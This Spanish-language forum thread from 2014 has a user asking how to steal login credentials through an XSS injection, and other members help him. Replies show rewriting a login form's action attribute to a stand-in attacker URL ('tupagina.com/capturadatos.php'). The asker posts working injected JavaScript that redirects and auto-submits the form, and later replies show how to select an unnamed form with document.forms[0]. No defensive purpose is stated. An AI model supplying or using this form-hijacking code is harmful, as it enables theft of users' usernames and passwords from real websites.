¿Como se puede robar post o get desde javascript?

Iniciado por Varlch, 21 Noviembre 2014, 14:26 PM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

Varlch

21 Noviembre 2014, 14:26 PM
¿Como se puede obtener post o get de un form desde un javascript y enviar estos a mi servidor?

Pongamos que hago una inyección XSS en una web donde esta el form de login, ¿se podría hacer que envíe el user y pass a mi servidor, o simplemente no se puede?

T. Collins

#1
21 Noviembre 2014, 14:32 PM Ultima modificación: 21 Noviembre 2014, 14:42 PM por T. Collins
Si como dices, puedes ejecutar javascript, claro que se puede. Por ejemplo, la forma más simple y cantosa es cambiar el action del form.

Varlch

#2
21 Noviembre 2014, 14:59 PM
¿Un pequeño ejemplo?

engel lex

#3
21 Noviembre 2014, 15:05 PM
es simplemente cambiar el action del form :P

es decir
si el form originalmente es
Código (html4strict) [Seleccionar]
<form method="POST" action="/paginadatos.php">
haces un jscript que lo cambie a
Código (html4strict) [Seleccionar]
<form method="POST" action="http://tupagina.com/capturadatos.php">

si tienes dudas sobre como hacerlo recomiendo leer un tutorial sobre jscript completo que toque manipulación del DOM :P
El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.

Varlch

#4
21 Noviembre 2014, 17:16 PM
He conseguido hacerlo
Código [Seleccionar]
<form action="" method="post" name="nombre_form">
<input type="text" name="Username" placeholder="Usuario"/><br />
<input type="password" name="Password" placeholder="Contraseña" /><br />
<input type="submit" value="Enviar" />
//código supuestamente inyectado
<script>
document.nombre_form.action = 'obtener_datos.php';
document.nombre_form.submit();
</script>

luego solo hace falta un obtener_datos.php que recoja las variables y las envié otra vez al servidor inicial pero que pasa si el form no tiene la variable name.

T. Collins

#5
21 Noviembre 2014, 17:48 PM
Puedes acceder al form de distintas formas, como has puesto tú, con document.getElementById si tiene un id, con document.forms[] ....

Varlch

#6
21 Noviembre 2014, 17:52 PM
Pongamos que tienes exactamente este form:
Código [Seleccionar]
<form action="" method="post">
<input type="text" name="Username" placeholder="Usuario"/><br />
<input type="password" name="Password" placeholder="Contraseña" /><br />
<input type="submit" value="Enviar" />
//código a inyectar

como robarías las supuestas credenciales en este mismo form.

T. Collins

#7
21 Noviembre 2014, 17:58 PM
Si es el único o primer form de la página, document.forms[0]. En el navegador tienes una consola de javascript y puedes ir probando, además hay mucha información en internet sobre como hacer esto.

Varlch

#8
21 Noviembre 2014, 18:01 PM
Pues ya esta todo resuelto, gracias.
Imprimir
Ir Arriba Páginas1
Acciones del Usuario